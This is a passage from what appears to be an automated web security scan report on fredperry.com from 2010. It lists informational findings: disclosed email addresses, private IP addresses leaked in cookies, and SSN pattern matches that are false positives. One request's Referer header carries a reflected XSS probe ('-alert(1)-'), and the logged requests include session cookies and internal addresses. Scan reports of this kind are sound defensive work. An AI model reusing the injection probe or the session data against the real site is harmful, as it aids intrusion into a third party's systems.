Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.13. https://www.fredperry.com/skin/frontend/default/default/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /skin/frontend/default/default/css/styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/styles.css HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Referer: https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Jul 2009 14:59:34 GMT
ETag: "d10bde-6ed6-46f2462cdc180"
Accept-Ranges: bytes
Content-Length: 28374
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

8. Private IP addresses disclosed
There are 15 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


8.1. http://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 15:45:19 +0000
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...

8.2. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/catalogue.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/catalogue.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 01 Nov 2010 15:48:48 GMT
ETag: "1ff0d1d-b42-493ffbe731800"
Accept-Ranges: bytes
Content-Length: 2882
Content-Type: text/css

/* Techy Jims Catalogue styling */


/* Main product listing grid */

.products-grid td
{
   width:25%;
}

.category-products,.category-title
{
   margin-left: 20px;
   margin-right: 20px;
}


.products-g
...[SNIP]...

8.3. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/clears.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/clears.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c6f-7ba-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1978
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

8.4. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/fp_style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/fp_style.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Oct 2010 14:35:29 GMT
ETag: "1ff0ec9-413a-4918f1b2b0e40"
Accept-Ranges: bytes
Content-Length: 16698
Content-Type: text/css

/* Global Settings */
body
{
   font-size: 11px;
   background: #dcdcdc;
   /*    border: 1px #000 solid;*/
}

a
{
   text-decoration:none;
   color:#333;
   outline:none;
}

a:hover
{
   text-decoration:underline;
}

...[SNIP]...

8.5. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/generalpages.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/generalpages.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Nov 2010 16:28:35 GMT
ETag: "1ff04c8-77c3-4948d1d9d72c0"
Accept-Ranges: bytes
Content-Length: 30659
Content-Type: text/css

/*
.page .main
{
   margin-top:10px;
}
*/

/*
.messages
{
   margin-bottom:20px;
}
*/

.greystrip {
background:#DCDCDC;
clear:both;
height:10px;
margin:0;
padding:0 20px 0 0;
}

#customercare h2
{
   backg
...[SNIP]...

8.6. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/generalpages.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/generalpages.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119066206.1815755339.1289339096.1289339096.1289339096.1
If-None-Match: "1ff04c8-77c3-4948d1d9d72c0"
If-Modified-Since: Mon, 08 Nov 2010 16:28:35 GMT

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 18:34:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Nov 2010 16:28:35 GMT
ETag: "d10411-77c3-4948d1d9d72c0"
Accept-Ranges: bytes
Content-Length: 30659
Content-Type: text/css

/*
.page .main
{
   margin-top:10px;
}
*/

/*
.messages
{
   margin-bottom:20px;
}
*/

.greystrip {
background:#DCDCDC;
clear:both;
height:10px;
margin:0;
padding:0 20px 0 0;
}

#customercare h2
{
   backg
...[SNIP]...

8.7. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_960.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/gs_960.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c73-e91-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 3729
Content-Type: text/css

.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15
...[SNIP]...

8.8. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_960.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/gs_960.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bce-e91-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 3729
Content-Type: text/css

.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15
...[SNIP]...

8.9. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_reset.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/gs_reset.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bcf-288-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 648
Content-Type: text/css

html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,
...[SNIP]...

8.10. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_text.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/gs_text.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bd0-1b5-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 437
Content-Type: text/css

body{font:13px/1.5 Helvetica,Arial,'Liberation Sans',FreeSans,sans-serif}a:focus{outline:1px dotted invert}hr{border-color:#ccc;border-style:solid;border-width:1px 0 0;clear:both;height:0}h1{font-size
...[SNIP]...

8.11. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_text.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/gs_text.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c75-1b5-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 437
Content-Type: text/css

body{font:13px/1.5 Helvetica,Arial,'Liberation Sans',FreeSans,sans-serif}a:focus{outline:1px dotted invert}hr{border-color:#ccc;border-style:solid;border-width:1px 0 0;clear:both;height:0}h1{font-size
...[SNIP]...

8.12. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/payment.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/payment.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c7a-110d5-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 69845
Content-Type: text/css

.main
{
   margin-top:20px;
}

.col-right
{
   border:none;
   padding:0;
   width:220px;
   margin: 0 10px 0 0;
}

/*========================================================================================
Geo
...[SNIP]...

8.13. http://www.fredperry.com/skin/frontend/default/default/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/print.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/print.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c7b-3c3-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 963
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

8.14. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/styles.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/styles.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Jul 2009 14:59:34 GMT
ETag: "d10bde-6ed6-46f2462cdc180"
Accept-Ranges: bytes
Content-Length: 28374
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

8.15. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/styles.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/styles.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Jul 2009 14:59:34 GMT
ETag: "1ff0c83-6ed6-46f2462cdc180"
Accept-Ranges: bytes
Content-Length: 28374
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

9. Social security numbers disclosed
There are 90 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.


9.1. http://www.fredperry.com/aboutus/careers/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The following social security number was disclosed in the response:

Request

GET /aboutus/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cgq0lrf3pfq3s1vteov0hpgkk3; expires=Tue, 09-Nov-2010 17:16:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.2. http://www.fredperry.com/aboutus/security/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The following social security number was disclosed in the response:

Request

GET /aboutus/security/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=p5vrjk00ae3sigp60d86d0v1j6; expires=Tue, 09-Nov-2010 17:16:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Securit
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.3. http://www.fredperry.com/aboutus/terms/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The following social security number was disclosed in the response:

Request

GET /aboutus/terms/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pj3msho8s6f82o2uje94gvq8k5; expires=Tue, 09-Nov-2010 17:16:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Terms &
